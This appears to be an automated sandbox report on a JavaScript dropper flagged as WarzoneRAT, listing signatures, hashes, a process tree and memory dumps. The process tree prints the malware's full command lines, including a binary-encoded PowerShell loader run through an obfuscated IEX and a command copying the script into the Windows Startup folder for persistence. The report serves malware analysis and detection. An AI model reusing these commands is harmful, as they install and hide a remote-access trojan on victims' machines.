Analysis

  • max time kernel
    575s
  • max time network
    589s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    29-11-2022 16:33

General

  • Target

    RFQ scope of requirements.js

  • Size

    2KB

  • MD5

    84ae648af28a2f5acd3c67fabde24615

  • SHA1

    45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b

  • SHA256

    c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d

  • SHA512

    7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Warzone RAT payload 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 51 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Can’t reach this page Can’t reach this page Make sure the web address http://104.223.67.151 is correct Search for this site on Bing Refresh the page Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. More information <id id="moreInformation">More information</id> This website could not be found. Error Code: INET_E_RESOURCE_NOT_FOUND Fix connection problems
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:2908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2248
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:3816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4540
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4820
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4820 CREDAT:82945 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1824
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4820 CREDAT:82948 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4280

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

      Filesize

      471B

      MD5

      bd4f3cb3175ff83bbc2c827705950a60

      SHA1

      9d940539de8317a8a6444559d9fc9f190dd9f80b

      SHA256

      ff821119d7d2bf9d795503ed63996c81611b84cdcdacac943da9a9ae2d0d2384

      SHA512

      02b99cb5a7e2cf6004fd010c5718f85830aca7b6f43b5ed929d2df8ca4209a29cfd9e54280a35392b2617ab58e578c097834ce24e9baa8b226c6181c64c0d377

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

      Filesize

      434B

      MD5

      f44c985ba364bc141b2990abf365c5ce

      SHA1

      560d5bc1a56c64f69de1b20ee8df2ac4ef3f50a5

      SHA256

      4a6d7fdc957ded99e4de0a7b4887cbcd95775a152dcc1b977e355dfe0bfde4af

      SHA512

      b2cb8f8574a4f0309cf2cec30be4cd92103896e3eb2d81f1da776d023d43f088f622befa7d3f2c15441d3dd8a95013813a5cada9e119c09a0ac53ec062f1f69a

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      5d574dc518025fad52b7886c1bff0e13

      SHA1

      68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

      SHA256

      755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

      SHA512

      21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\BUS9FHJ9.cookie

      Filesize

      610B

      MD5

      dcc8a1db2d56ab4c9a39ee734385b82f

      SHA1

      3e5445c7d0dfea17cb8746fae7ae8b701f17f3e1

      SHA256

      5a485e562f1860d8df1ec446bd53b37268bec075334f9c347464187174b638db

      SHA512

      702e2b900f0479acfe3a202b3bd51c2fed73230f90c254c1fd3d843b3a490745bffad4ba16142da010983c0d58147b8ae6d2aa33d391947230c4c12f29a94796

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\N12JX9E1.cookie

      Filesize

      611B

      MD5

      e1b005eb7793db94304b93539b1b279c

      SHA1

      f51c45185cf20d4af76392aaadb1b751339d52c5

      SHA256

      a5656e9baccebf45ceb60cec6393f5a39c962872c003b5fe583dbef46659cd55

      SHA512

      f5ce6d551ccdbb559f4166c7344bbf32ac372448eeb25e55c2c9cecc201cdfb3da30144e23641146dc669c4608f04348b93024d329fa4b24dbce537cf5106412

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      57d6a8dc2329bcbcf79cbd0b6757b69c

      SHA1

      65f0bbe8f3624464d92e7b15a5ac122d0cba30a3

      SHA256

      e4be33f03a3295ca4a7db146b5dc918955640739fc2ae808f99eb7bf51ac7adb

      SHA512

      ff83bbb1c52a8ab1f6c96d6521aace9b5adede54e3956f114b2b10609ceef222fef6bf2fd2a9fa5c6254a45570343e42c2efd2198415aaa58415a1048f12e6b7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      57d6a8dc2329bcbcf79cbd0b6757b69c

      SHA1

      65f0bbe8f3624464d92e7b15a5ac122d0cba30a3

      SHA256

      e4be33f03a3295ca4a7db146b5dc918955640739fc2ae808f99eb7bf51ac7adb

      SHA512

      ff83bbb1c52a8ab1f6c96d6521aace9b5adede54e3956f114b2b10609ceef222fef6bf2fd2a9fa5c6254a45570343e42c2efd2198415aaa58415a1048f12e6b7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      7f4d6731dfaf45d2223cff6c175e8f1c

      SHA1

      9be3fb93ba8b943f0bd196f0b9f144525bbb7962

      SHA256

      72ee01f3e8074ac94ecf85e476a9ceebb6277df033f9578c3b3a6281346f5ac5

      SHA512

      84fa885bac361df0be8c067b59cc72f609d2ff62f9089354da3ec9100116a4c5b2eafad3224fad023efe92ae7ac654341a7303d31bea332872c288b561f32fe1

    • \Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll

      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    • \Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll

      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    • memory/1140-130-0x00000290544A0000-0x00000290544C2000-memory.dmp

      Filesize

      136KB

    • memory/1140-120-0x0000000000000000-mapping.dmp

    • memory/2248-214-0x000001FD79470000-0x000001FD7948E000-memory.dmp

      Filesize

      120KB

    • memory/2248-213-0x000001FD79450000-0x000001FD79468000-memory.dmp

      Filesize

      96KB

    • memory/2248-206-0x00007FFA4B370000-0x00007FFA4B49C000-memory.dmp

      Filesize

      1.2MB

    • memory/2248-204-0x000001FD79400000-0x000001FD79430000-memory.dmp

      Filesize

      192KB

    • memory/2248-158-0x0000000000000000-mapping.dmp

    • memory/2908-133-0x000001CD5B250000-0x000001CD5B2C6000-memory.dmp

      Filesize

      472KB

    • memory/2908-121-0x0000000000000000-mapping.dmp

    • memory/3816-245-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-256-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-224-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-225-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-226-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-227-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-229-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-230-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-228-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-232-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-233-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-234-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-235-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-236-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-237-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-238-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-240-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-241-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-243-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-244-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-242-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-239-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-231-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-222-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-246-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-249-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-247-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-248-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-251-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-250-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-252-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-253-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-254-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-221-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-255-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-257-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-258-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/3816-259-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-260-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-261-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-262-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-263-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-264-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-265-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-266-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-268-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-269-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-270-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-272-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-273-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-274-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-275-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-276-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-278-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-277-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-271-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/3816-279-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-280-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-281-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-282-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-220-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-219-0x0000000077340000-0x00000000774CE000-memory.dmp

      Filesize

      1.6MB

    • memory/3816-287-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/3816-216-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/3816-217-0x000000000040B556-mapping.dmp

    • memory/4540-159-0x0000000000000000-mapping.dmp